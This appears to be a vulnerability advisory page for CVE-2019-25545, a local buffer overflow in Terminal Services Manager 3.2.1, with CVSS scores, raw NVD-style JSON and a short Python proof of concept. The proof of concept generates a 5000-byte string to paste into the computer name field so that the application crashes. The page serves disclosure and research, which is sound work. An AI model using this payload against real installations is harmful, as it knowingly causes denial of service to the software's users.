Security Vulnerability Report
中文
CVE-2019-25545 CVSS 6.2 MEDIUM

CVE-2019-25545

Published: 2026-03-21 13:16:16
Last Modified: 2026-04-16 17:44:45
Source: [email protected]

Description

Terminal Services Manager 3.2.1 contains a local buffer overflow vulnerability that allows attackers to crash the application by supplying an excessively long string in the computer name field. Attackers can input a 5000-byte buffer of data into the 'Computer name or IP address' field during computer addition, causing a denial of service when the server entry is accessed.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:lizardsystems:terminal_services_manager:3.2.1:*:*:*:*:*:*:* - VULNERABLE
Terminal Services Manager 3.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys # PoC for CVE-2019-25545 # This script generates the payload to trigger the buffer overflow. # Usage: Copy the output and paste it into the 'Computer name or IP address' field # in Terminal Services Manager 3.2.1 when adding a new computer. def generate_payload(): # The vulnerability is triggered by a buffer of approximately 5000 bytes buffer_size = 5000 payload = "A" * buffer_size return payload if __name__ == "__main__": payload = generate_payload() print(f"[+] Generated payload of length: {len(payload)}") print("[+] Payload:") print(payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25545", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:16.193", "lastModified": "2026-04-16T17:44:44.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Terminal Services Manager 3.2.1 contains a local buffer overflow vulnerability that allows attackers to crash the application by supplying an excessively long string in the computer name field. Attackers can input a 5000-byte buffer of data into the 'Computer name or IP address' field during computer addition, causing a denial of service when the server entry is accessed."}, {"lang": "es", "value": "Terminal Services Manager 3.2.1 contiene una vulnerabilidad local de desbordamiento de búfer que permite a los atacantes bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo de nombre de equipo. Los atacantes pueden introducir un búfer de datos de 5000 bytes en el campo 'Nombre de equipo o dirección IP' durante la adición de un equipo, causando una denegación de servicio cuando se accede a la entrada del servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lizardsystems:terminal_services_manager:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "CDEB2633-D29F-474D-80D3-B0955DEF4101"}]}]}], "references": [{"url": "https://lizardsystems.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46911", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/terminal-services-manager-local-buffer-overflow-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.